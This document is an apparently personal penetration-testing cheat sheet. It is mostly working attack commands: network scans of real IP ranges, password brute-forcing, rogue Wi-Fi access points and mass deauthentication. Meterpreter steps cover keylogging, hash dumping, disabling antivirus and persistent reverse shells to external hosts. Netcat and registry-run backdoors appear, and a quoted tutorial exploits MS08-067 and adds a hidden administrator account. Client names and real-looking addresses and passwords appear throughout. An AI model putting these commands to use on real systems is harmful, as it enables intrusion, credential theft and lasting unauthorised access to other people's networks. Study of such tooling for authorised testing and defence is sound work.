# class b ADDfff -Pn to not ping ( assume up and no ping scan, it will take longer ) use control + D to end script and save at job
# this will run at 7pm in a screen so you can reattach / check status and Ctrl+c out to save and use nmap -r to resume if need be
at 19:00
screen bash at.sh
# at.sh script
nmap -T5  -p 20,21,80,115,443,989,990 -vvvv -sS  -n --max-rtt-timeout 300ms --max-retries 1 192.159.0.0/16 -oA /home/administrator/rmccurdy/safg/192.159.0.0_fast_ping
# class b external 65k host fast ping scan 7 ports 30min
# Nmap 5.61TEST2 scan initiated Thu Dec 29 21:02:11 2011 as: nmap -T5 -p 20,21,80,115,443,989,990 -vvvv -sS -n --max-rtt-timeout 300ms --max-retries 1 -oA /home/administrator/rmccurdy/safg/192.30.0.0_fast_ping 192.30.0.0/16
# Ports scanned: TCP(7;20-21,80,115,443,989-990) UDP(0;) SCTP(0;) PROTOCOLS(0;)
# Nmap done at Thu Dec 29 21:29:10 2011 -- 65536 IP addresses (40675 hosts up) scanned in 1618.92 seconds

nmap -p53 -script dns-zone-transfer -script-args dnszonetransfer.domain=aeiginsurance.com


# medusa hydra
./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179


http://www.foofus.net/~jmk/medusa/medusa.html
medusa -M ftp -H targets -u Anonymous -p KPMG_AUDIT -v 6 -T 30 -g 2 -R 1
medusa -M mysql -H # change the -T for more threds -t is for per host keep it 1 ..
medusa -M ssh -H 22 -u root -p tcr1tt3r -v 6 -g 2 -R 1 -t 1 -T 1
medusa -h 192.168.1.103 -u administrator -P passwords.txt -e ns -M smbnt


mysql -u root -P mysqlpass.txt -v 6 -T 1 -g 2 -R 1
nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n

# email over telnet
RSET
HELO
MAIL FROM:<root@whatismyip.com>
RCPT TO:<"freeload101@yahoo.com">
data
this is a test from KPMG w00t
.
--------
route add 10.101.14.0 netmask 255.255.255.0 gw 10.101.13.1 dev eth05

.\nmap -script smb-check-vulns.nse --script-args=unsafe=1 -p445 10.104.101.59
.\nmap --script smb-enum-shares.nse -p445 10.104.101.59
.\nmap --script smb-enum-users.nse -p445 10.104.101.59
.\nmap.exe --script smtp-commands.nse -pT:25,465,587
.\nmap.exe --script smtp-enum-users.nse -pT:25,465,587
 a

# sid enum using nmap and metasploits sid.txt 1307 sids in ~8 seconds
nmap -n --script=oracle-sid-brute -p 1521-1560 192.168.1.141

# try 1255 user/pass
# requires valid SID  ( default is XE )
# Performed 1245 guesses in 3 seconds, average tps: 415
nmap --script oracle-brute -p  1521-1560 --script-args oracle-brute.sid=XE  -n 192.168.1.141

# oracle shell using OAT Oracle Audit Tool
ose.bat -s 192.168.1.141 -u SYS -p CHANGE_ON_INSTALL -d XE -t Windows

# route all to 10.127.120.97
route add 0.0.0.0 mask 0.0.0.0 10.127.120.97
# route 75.131.211.0 to VPN or other connectoin
route add 75.131.211.0 mask 255.255.255.0 192.168.77.254
# route rmccurdy over VPN
route add 75.131.211.0 mask 255.255.255.0 10.31.128.1


warvox notes:
* you also have to contact support and have IAX unlocked on the account
Â· Normally I have 3 max threads and set it for 15-20 sec then with sql get the completed = 0 and run them thought again with 53 sec ringtime.
Â· Let me know if you need any help
google warvox for general notes "login etc .. just read all of it please ... use vitelity as the provider )
3 at a time max ..
screen
ruby warvox.rb ( run warvox in screen so you can screen -r if you get dropped google screen Manuel ... )
use SELF as the caller ID
ranges are 15555555555:15555555555
or 155555XXX


SELECT * FROM DIAL_RESULTS where completed = 'f' and dial_job_id >= '68' and busy = 'f' and ringtime <= '52';
* if don.t add the .and ringtime <= '52' I get 2K hits . I would assume this is because it if did not answer it labeled it as not completed instead of labeling it timeout for some reason ?
* ~700 ringtime <= '52' with no data file... some high ringtimes but most were instant busy signal but not marked as complete or busy with no data file
SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'voice' ;
SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'fax' ;
SELECT count(*) FROM DIAL_RESULTS where dial_job_id = '110' and line_type = 'modem' ;
SELECT * FROM DIAL_RESULTS where dial_job_id = '110' and busy = 't';


rcracki_mt /s2/LM/lm_alpha-numeric-symbol32-space#1-7_* -f /usr/local/sbin/hash
rcrack /s2/LM/lm_alpha-numeric-symbol32-space#1-7_* -f hash2
# example input file 4ee is null or blank
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
#notes
http://ob-security.info/?tag=hashcat


wget -O giskismet-0.02.tar.gz \
"http://my-trac.assembla.com/giskismet/browser/tags/giskismet-0.02.tar.gz?format=raw"
tar -xzvf giskismet-0.02.tar.gz
rm giskismet-0.02.tar.gz

We need a few packages first.

apt-get update
apt-get install libxml-libxml-perl libdbi-perl libdbd-sqlite3-perl -y

Do the install


cd giskismet-0.02
perl Makefile.PL
make
make install


giskismet -x wardrive.netxml
giskismet -q "select * from wireless" -o output.kml


giskismet -q 'select * from wireless where ESSID like "_%"' wireless.dbl  -o ouput2.kml


Before we map our dat

# following steps are for BT4:
# edit the kismet.conf and add the /dev/ttyUSB0 etc .. (find / -name kismet.conf )
# load the kernal mod for garmin gps
modprobe garmin_gps
# plugin the the garmion GPS18 USB puck
# if I dont run this command it hangs and kill -9 will not even work so have to reboot
mount -t usbfs none /proc/bus/usb/
# setup gpsd shoud show changy bits so you know it is trying to lock !
dpkg-reconfigure gpsd
#start gpsd
/etc/init.d/gpsd stop
gpsd -N -n -D 2 /dev/ttyUSB0
# test
ls -al /dev/ttyUSB0
xgps
#also test by
telnet localhost 2947
# in kismet you will get nodata untill it has a lock ( this took upto 500seconds in xgps ) you can run XGPS and KISMET at the same time.

/etc/init.d/wicd stop
/etc/init.d/networking stop
killall dhclient dhcpcd


# ssh logins
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 10.13.102.2,177
set USER_FILE "C:/wordlist/password_small.txt"
set RHOSTS_FILE "C:/wordlist/targests.txt"
run
back
use auxiliary/gather/dns_enum
set DOMAIN 10.21.1.69
run


--------------------------------------

airbase notes
------------
mass deauth
# broken because you need listen on the right channel before you deauth ... so I need channel and sesstion and ap info all in one line ..
# cleanup
rm -f clients*.csv
# dump clients
airodump-ng mon0 -o csv -w clients &
# lets sleep on it we need station ids
sleep 60
killall airodump-ng
# make script to mass deauth
grep -ia -A 10000  Station clients*.csv |egrep -v "(not|Station)" | sed 's/,/ /g' | awk '{print "aireplay-ng -0 1 -a",$8,"mon0 --ignore-negative-one  -c",$1}'|grep : > killclients
bash -x killclients
-----------------------------------------------
gogogo
----------------
^Croot@bt:/stuff/airbase# cat GO

killall  avahi-daemon avahi-daemon NetworkManager wpa_supplicant
killall dhcpd3 dhclient dhclient3 dhcpcd dhcpd
airmon-ng start wlan1
sleep 5
xterm -e "airbase-ng -c 6 -P mon0 -v" &
sleep 5
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 &
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 &
sleep 5
cd /pentest/exploits/framework &
xterm -e "tcpdump -i at0 -n port 67 and port 68"  &
sleep 5
xterm -e "/pentest/exploits/framework/msfconsole -r /pentest/exploits/framework/karma.rc"
------------------
# depends for airdcrack

apt-get install build-essential  -y
apt-get install libssl-dev -y
apt-get install openssl-dev -y
apt-get install partimage gparted lynx links curl nmap iotop screen medusa trafshow wireshark -y --force-yes
# more depends set autopwn
apt-get install upx-ucl upx-nrv -y
apt-get install build-essential ruby libruby rdoc libyaml-ruby libzlib-ruby libopenssl-ruby libdl-ruby libreadline-ruby libiconv-ruby libgtk2-ruby libglade2-ruby subversion sqlite3 libsqlite3-ruby irb -y
apt-get install ruby libruby rdoc -y
apt-get install libyaml-ruby -y
apt-get install libzlib-ruby -y
apt-get install libopenssl-ruby -y
apt-get install libdl-ruby -y
apt-get install libreadline-ruby -y
apt-get install libiconv-ruby -y
apt-get install rubygems -y

#apt-get install postgresql postgresql-client postgresql-contrib -y
apt-get install pgadmin3 -y
apt-get install python-pymssql -y
gem1.8 install rails
# get set and msf
mkdir /pentest/
mkdir /pentest/exploits
cd /pentest/exploits
# check out /install  aircrack latest
svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng
make clean
make
make install
airodump-ng-oui-update
# create mon0
airmon-ng start wlan1
# start airbase on mon0 it creates at0 to us with dhcpd ! ( may not need to include channel ... )
airbase-ng -c 6 -P mon0 -v
# install dhcp3 server
apt-get install  dhcp3-server -y
-----------------------------------------------------------
# DHCP CONF
cat /etc/dhcp3/dhcpd.conf
----------------------------------------------------------------
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
-------------------------------------------------------------------------------
# setup at0 interface that airbase created to listen on IP configured for dhcp server
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
# start dhcp server
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
# cd to framework root ..
cd /pentest/exploits/framework
wget http://digitaloffense.net/tools/karma.rc -O karma.rc
# start msfconsole using the mass client sides basicly karma.rc
msfconsole -r karma.rc
# start TCP dump looking for DHCP requests from the remote host !
tcpdump -i at0 -n port 67 and port 68
# mass client side too buggy ... to many iframes ... come back to it ... try SMB_REPLAY attack ...? or limit client side attacks ?
# for mass client side attack using etterfilter for targets:
apt-get install ettercap -y
# run mass client side attack
cd /pentest/exploits/fasttrack
fast-track.py -i
# choose mass client side attack etc and run metasploitloadfile manuely ...
# when all is running etc ....  start msfconsole with the metasploitloadfile script in the base folder of fasttrack
msfconsole -r metasploitloadfile
http://digitaloffense.net/tools/karma.rc
+-+-+-
airmon-ng start wlan0
airbase-ng -c 9 -P -C60  -z 2 -W 1 mon0
ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
    dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan0
killall dhclient dhcpcd dhclient3
airmon-ng start wlan1
airbase-ng -c 9 -P -C60  -z 2 -W 1 mon1
ifconfig wlan1 up 10.0.0.1 netmask 255.255.255.0
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan1
iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
#airbase-ng -c 9 -P -C60  -z 2 -W 1 mon1
00:0C:43:41:46:34  -37           13            2        0   6  54e. WPA  TKIP   PSK  rmccurdyDOTcom1

airbase-ng -c 6 -a  00:0C:43:41:46:34 -C60  -z 2 -W 1 -v --essid rmccurdyDOTcom1 mon0
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -f log wlan1
i
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
tcpdump -i at0 -n port 67 and port 68
 armatage
apt-get install -y postgresql
apt-get install libpq-dev -y
gem install postgres

/etc/init.d/postgresql start


su -
su - postgres


createuser msf_user -P
createdb --owner=msf_user msf

/pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
/pentest/exploits/framework/armitage
wifi notes
------------------------
internet@rmccurdydotcom /cygdrive/c/temp
# egrep "BSSID|<manuf>|<max_signal_dbm>|<ssid>" "Kismet-20110929-11-17-47-1.net
xml" | tr -d '\n' |  awk '{gsub("<BSSID>",",\n"); print}' | sed -e 's/<\/BSSID>
/,/g' -e 's/        <manuf>//g' -e 's/<\/manuf>//g' -e 's/          <max_signal_dbm>/,/
g' -e 's/<\/max_signal_dbm>/,/'g -e 's/                <ssid>/,/g' -e 's/<\/ssid>//
g'> 2.csv
internet@rmccurdydotcom /cygdrive/c/temp
# load the kernal mod for garmin gps
modprobe garmin_gps
# plugin the the garmion GPS18 USB puck
# if I dont run this command it hangs and kill -9 will not even work so have to reboot
mount -t usbfs none /proc/bus/usb/
# setup gpsd
dpkg-reconfigure gps
# test
ls -al /dev/ttyUSB0
xgps
#also test by
telnet localhost 2947
# in kismet you will get nodata untill it has a lock ( this took upto 500seconds in xgps ) you  can run XGPS and KISMET at the same time.

------------------------


----------------------

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z


# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressReleases/Press%20Releases/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf


use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run


# shows all the scripts
run [tab]

# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30
# new method run persistence -U -i 5 -p 443 -r 192.168.1.71

run get_pidgin_creds

idletime
sysinfo


# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"

# eslcate to system
use priv
getsystem


execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t

# list top used apps
run prefetchtool -x 20

# list installed apps
run prefetchtool -p

run get_local_subnets

# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office

# alternate
download -r "%USERPROFILE%\\desktop"  ~/
download -r "%USERPROFILE%\\my documents"  ~/

# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t


# does some run wmic commands etc
run winenum


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4

# vnc / port fwd for linux
run vnc

# priv esc
run kitrap0d


run getgui

# somewhat broken .. google sdt cleaner  NtTerminateProcess !@?!?!
run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"


getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787

run msf_bind
run msf_bind -p 1975
rev2self
getuid

getuid


enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254


# Windows Login Brute Force Meterpreter Script
run winbf -h

# upload a script or executable and run it
uploadexec


# Using Payload As A Backdoor  from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe"  /ED 11/11/2011


# kill AV this will not unload it from mem it needs reboot or kill from memory still ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe  -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe  -O "c:\Program Files\Kaspersky\avp.exe" dummy

Nessus Scanning through a Metasploit Meterpreter Session
By
Mark Baggett
on March 16, 2010 6:44 AM | Permalink

By Mark Baggett

Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.

The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).


Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.

Preparing for a custom command line OpenSSH Installation in your lab

The basic steps to prepare a command line OpenSSH installation for Windows are as follows:

1. Download the setupssh.exe installation package from http://sshwindows.sourceforge.net/download

2. Run the GUI installer package on your Windows lab/test machine. I suggest accepting the default program location of C:\Program Files\OpenSSH

3. Get a full copy of all of the files under the directory C:\Program Files\OpenSSH onto a USB flash drive or other favorite media. Copy recursively with XCOPY and make sure you fully retain the directory structure.

4. Export the following registry keys using the REG EXPORT command as follows:

REG EXPORT .HKLM\SOFTWARE\Cygnus Solutions. 1.REG
REG EXPORT .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. 2.REG
REG EXPORT .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. 3.REG

5. Concatenate all of these registry files together into one file.
TYPE 1.REG 2.REG 3.REG >OPENSSH.REG

6. Save this OPENSSH.REG file into your local copy of all of the openssh directory structure.


Performing an installation via command shell

Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.

Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.


Exploiting the Vulnerability

[root@localhost framework-3.2]# nc -v 192.168.1.40 445
Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded!
[root@localhost framework-3.2]# ./msfconsole

msf > search exploits ms08_067
[*] Searching loaded modules for pattern 'ms08_067'...
Exploits
========
Name Description
---- -----------
windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40
RHOST => 192.168.1.40
msf exploit(ms08_067_netapi) > set TARGET 5
TARGET => 5
msf exploit(ms08_067_netapi) > show options

... truncated output ...
Exploit target:

Id Name
-- ----
5 Windows 2003 SP0 Universal


msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)

meterpreter > sysinfo
Computer: SYSTEM-HJ28HHGL7N
OS : Windows .NET Server (Build 3790, ).


Uploading your OpenSSH Files

meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH
meterpreter > lpwd
/mnt/PenTestTools/win32/OpenSSH
meterpreter > cd \
meterpreter > cd "Program Files"
meterpreter > mkdir openssh
Creating directory: openssh
meterpreter > cd openssh
meterpreter > pwd
C:\Program Files\openssh
meterpreter > upload -r . .
[*] uploading : ./uninstall.exe -> .\uninstall.exe
[*] uploaded : ./uninstall.exe -> .\uninstall.exe
[*] mirroring : ./bin -> .\bin
[*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe
[*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe
[*] uploading : ./bin/chown.exe -> .\bin\chown.exe
[*] uploaded : ./bin/chown.exe -> .\bin\chown.exe
[*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
[*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
.... lots of output truncated ....

meterpreter > execute -f cmd.exe .i
Process 848 created.
Channel 66 created.


Modifying the Registry and Adding Your Own Username

Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.


Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\openssh>whoami
whoami
nt authority\system

C:\Program Files\openssh>reg import openssh.reg
reg import openssh.reg
The operation completed successfully.

C:\Program Files\openssh>net user inet_p0wned gameover /add
net user inet_p0wned gameover /add
The command completed successfully.


C:\Program Files\openssh>net localgroup administrators inet_p0wned /add
net localgroup administrators inet_p0wned /add
The command completed successfully.


C:\Program Files\openssh>cd etc
cd etc

C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd
..\bin\mkpasswd -l >passwd
C:\Program Files\openssh\etc>..\bin\mkgroup -l >group
..\bin\mkgroup -l >group

C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
[SC] CreateService SUCCESS


Start the OpenSSH Service

C:\Program Files\openssh\etc>sc start opensshd
sc start opensshd
SERVICE_NAME: opensshd
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE,
IGNORES_SHUTDOWN))
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 1916
FLAGS :

C:\Program Files\openssh\etc>sc query opensshd
sc query opensshd
SERVICE_NAME: opensshd
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN))
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24

The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**

**Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don.t leave a gaping opportunity while testing.

C:\Program Files\openssh\etc>exit
exit
meterpreter > quit

[*] Meterpreter session 1 closed.
msf exploit(ms08_067_netapi) > quit


Now, lets go ahead and SSH into our Windows server to check if things worked!


root@localhost:~/framework-3.2]# ssh inet_p0wned@192.168.1.40
The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established.
RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.

OpenSSH for Windows. Welcome aboard!

inet_p0wned@192.168.1.40's password:
Could not chdir to home directory /home/inet_p0wned: No such file or directory
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Program Files\OpenSSH>
C:\Program Files\OpenSSH>whoami
system-hj28hhgl7n\inet_p0wned

C:\Program Files\OpenSSH>exit
Connection to 192.168.1.40 closed.
[root@localhost framework-3.2]#


Cleaning up

To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.

C:\> SC STOP opensshd
C:\> SC DELETE opensshd
C:\> REG DELETE .HKLM\SOFTWARE\Cygnus Solutions. /f /va
C:\> REG DELETE .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. /f /va
C:\> REG DELETE .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. /f /va

C:\> CD "\Program Files"
C:\Program Files> RMDIR /Q /S opensshd
C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22
C:\Program Files> NET USER inet_p0wned /DELETE # pivot
http://www.offensive-security.com/metasploit-unleashed/Pivoting

use exploit/windows/smb/psexec
set RHOST 10.1.13.2
set SMBUser Administrator
set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
set PAYLOAD windows/meterpreter/bind_tcp
exploit


# make exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.55 LPORT=443 R | ./msfencode -t exe -c 5 -o /tmp/bob.exe

# attacker listen
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.55
set LPORT 443
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 192.168.6.55 -p 443 -A -X -i 30

exploit -j -z


# armatage
apt-get install mysql-server -y
/etc/init.d/mysql start

mysqladmin -u root -ppassword password toor


/pentest/exploits/framework/msfrpcd -f -U msf -P test -t Basic


# armatage

apt-get install -y postgresql

apt-get install libpq-dev -y

gem install postgres

/etc/init.d/postgresql start


su -
su - postgres


createuser msf_user -P
createdb --owner=msf_user msf


/pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
/pentest/exploits/framework/armitage


net user newuserhere PASSWORDHERE /add
net localgroup administrators newuserhere /add


"c:\program files\nmap\nmap.exe" -vvv -n -p 1527,3200,3201,3300,3600,8000,8100,8101,40000-40005,50013,50113 -A 192.168.56,14,6,7,8,9.1-255 -oA sap

 ----


# ssh
use auxiliary/scanner/ssh/ssh_login

#set RHOSTS_FILE "C:/backup/wordlist/targests.txt"


set RHOSTS 4.59.139.135 4.59.139.136 4.59.139.140 63.116.61.25 63.116.61.26 63.116.61.34
# set USER_FILE "C:/backup/wordlist/password_large.txt"
set USERPASS_FILE "C:/backup/wordlist/root_userpass.txt"
set VERBOSE true
set STOP_ON_SUCCESS true
set BRUTEFORCE_SPEED 5
# set this to the number of host
set THREADS 6

run


use auxiliary/gather/dns_enum
set DOMAIN domain.com
run


#smb

use auxiliary/scanner/smb/smb_login

set RHOSTS file://192.168.8.39
set RHOSTS 127.0.0.1

set USER_FILE "C:/wordlist/users.txt"
set PASS_FILE "C:/wordlist/2.txt"
set VERBOSE false
# set to number of host scanning .
set THREADS 16

set STOP_ON_SUCCESS true
set VERBOSE true
set BLANK_PASSWORDS false


# http

use auxiliary/scanner/http/http_login
set AUTH_URI /folder?dcPath=ha-datacenter
set RHOSTS 127.0.0.1 127.0.0.1 127.0.0.1
set VERBOSE true
run


back

# telnet
use auxiliary/scanner/telnet/telnet_login
set RHOSTS 127.0.0.1,49,50

set PASS_FILE "C:/wordlist/password_small.txt"
set THREADS 254
run


back


# mssql
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/password_small.txt"
set USERNAME sa
set VERBOSE false
run


back


#ftp
use auxiliary/scanner/ftp/ftp_login
set RHOSTS  127.0.0.1
set PASS_FILE /home/administrator/alcoa/alcoa_small.txt
set USER_FILE /home/administrator/alcoa/alcoa_small.txt
set BRUTEFORCE_SPEED 1
run


#snmp
use auxiliary/scanner/snmp/snmp_login
set RHOSTS  127.0.0.1
set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
set VERBOSE false

run


nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n


./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179


#  onlt works for Delegation Tokens
list_tokens -u
impersonate_token ORACLE-ENT\\Administrator


# after hijack incognito
use auxiliary/server/capture/smb
